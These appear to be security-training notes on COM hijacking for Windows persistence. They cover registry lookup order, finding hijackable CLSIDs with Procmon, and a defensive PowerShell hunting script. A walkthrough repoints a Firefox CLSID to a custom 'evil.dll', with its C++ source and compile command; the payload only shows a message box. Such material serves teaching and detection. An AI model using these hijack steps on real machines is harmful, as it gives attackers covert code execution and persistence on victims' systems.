Secondary Categories: 02-Malware 02-Persistence


Description:

The Component Object Model (COM) was introduced in Windows 3.11. It is an object-oriented system for building binary software components that can interact with each other, which lets a program reuse a component without knowing how it is implemented internally.

When a program needs to load a COM object, it calls the Windows API CoCreateInstance to construct an uninitialized instance of a specific class, passing the CLSID (class identifier) as one of the required parameters. When CoCreateInstance is called with a particular CLSID value, the operating system consults the registry to find out which binary contains the requested COM code.


As seen in the screenshot above, the InProcServer32 subkey of CLSID A1DB7B5E-D0EA-4FE0-93C4-314505788272 has a (Default) value pointing to TaskflowDataEngine.dll.

Depending on how the COM server is hosted (in-process DLL or separate server process), the path to the binary is stored in one of the following subkeys:

  • InprocServer/InprocServer32
  • LocalServer/LocalServer32
  • TreatAs
  • ProgID

and the top-level key in the registry is one of:

  • HKEY_CURRENT_USER\Software\Classes\<CLSID>
  • HKEY_LOCAL_MACHINE\Software\Classes\<CLSID>

Discovery

To find COM keys that could be hijacked, you can use Procmon with the following filters:


It is also worth adding the filter: Exclude if Path begins with HKLM.

When a COM object is loaded, HKEY_CURRENT_USER (HKCU) is examined first, giving preference to user-specified COM objects. Only then is the COM object looked up in HKEY_CLASSES_ROOT (HKCR), which in this case resolves to the HKLM entry.
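Because a CLSID registered under HKCU\Software\Classes takes precedence over the same CLSID under HKLM, a defender can turn this lookup order into a hunt: enumerate every per-user COM server registration and check whether it shadows a machine-wide one and where its binary lives. The PowerShell below is an added example, not part of these notes; the function name Find-ComHijackCandidates and the "outside Windows/Program Files" heuristic are my own choices, not Windows or Procmon features.

```powershell
function Find-ComHijackCandidates {
    # Added hunting helper (hypothetical name). Walks HKCU\Software\Classes\CLSID and
    # reports each server subkey together with the HKLM entry it would shadow.
    $serverSubkeys = 'InprocServer32', 'InprocServer', 'LocalServer32', 'LocalServer', 'TreatAs'
    $userRoot      = 'HKCU:\Software\Classes\CLSID'
    $machineRoot   = 'HKLM:\Software\Classes\CLSID'
    if (-not (Test-Path $userRoot)) { return }   # no per-user COM registrations at all

    foreach ($clsidKey in Get-ChildItem -Path $userRoot) {
        $clsid = $clsidKey.PSChildName
        foreach ($sub in $serverSubkeys) {
            $userKey = "$userRoot\$clsid\$sub"
            if (-not (Test-Path $userKey)) { continue }

            # The (Default) value holds the server path (or, for TreatAs, another CLSID).
            $userTarget    = (Get-ItemProperty -Path $userKey).'(default)'
            $machineKey    = "$machineRoot\$clsid\$sub"
            $machineTarget = if (Test-Path $machineKey) { (Get-ItemProperty -Path $machineKey).'(default)' }

            # Heuristic clean-up: drop quotes and trailing " /args" or " -args", then expand
            # %SystemRoot%-style variables so the binary can be located on disk.
            $path = "$userTarget" -replace '"', '' -replace '\s+[/-].*$', ''
            $path = [Environment]::ExpandEnvironmentVariables($path)
            $inSystemDir = ($path -like "$env:SystemRoot\*") -or ($path -like "$env:ProgramFiles\*")

            [pscustomobject]@{
                CLSID         = $clsid
                Subkey        = $sub
                UserTarget    = $userTarget
                MachineTarget = $machineTarget
                ShadowsHKLM   = [bool]$machineTarget          # HKCU entry overrides an HKLM one
                FileExists    = ($sub -ne 'TreatAs') -and ($path -ne '') -and (Test-Path -LiteralPath $path)
                OutsideSystem = -not $inSystemDir             # binary lives in a user-writable location
            }
        }
    }
}

# Triage order: entries that both shadow a machine-wide CLSID and point outside
# Windows/Program Files match the hijack pattern described above and go first.
Find-ComHijackCandidates |
    Sort-Object ShadowsHKLM, OutsideSystem -Descending |
    Format-Table -AutoSize
```

Run it in the context of each interactive user (HKCU is per-user), and compare the output against a known-good baseline, since some legitimate per-user installers also register COM servers under HKCU.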

Example

In the example below, firefox.exe looks up the COM object with CLSID A6FF50C0-56C0-71CA-5732-BED303A59628. Searching for this CLSID under HKCU shows that it is not present there, but it is found under HKCR.


We can then export this entry and modify it so that it points to our malicious DLL.

The code being executed:

/*
evil.cpp
simple DLL for DLL inject to process
author: @cocomelonc
https://cocomelonc.github.io/tutorial/2021/09/20/malware-injection-2.html
*/
 
#include <windows.h>
#pragma comment (lib, "user32.lib")
 
// DllMain is called by the loader with a reason code each time the DLL is
// mapped/unmapped or a thread starts/stops in the host process.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD nReason, LPVOID lpReserved) {
  switch (nReason) {
  case DLL_PROCESS_ATTACH:
    // Runs once when the DLL is loaded into the process, i.e. when the
    // hijacked CLSID is resolved and its InprocServer32 binary is mapped.
    MessageBox(
      NULL,
      "Meow from evil.dll!",
      "=^..^=",
      MB_OK
    );
    break;
  case DLL_PROCESS_DETACH:
    break;
  case DLL_THREAD_ATTACH:
    break;
  case DLL_THREAD_DETACH:
    break;
  }
  return TRUE;  // report successful initialization to the loader
}

Compiling the DLL:

x86_64-w64-mingw32-g++ -shared -o evil.dll evil.cpp -fpermissive

With the registry export file modified and a working DLL, we can import it back into the registry.


Once that is done we can close Firefox, start it again and see that our DLL is run.


Extra

Note that once our DLL is run by Firefox we can use Process Hacker to get the PID. The PID of the process showing the message box is 9272, but if we look at the firefox process and its child processes, PID 9272 is not listed among them.


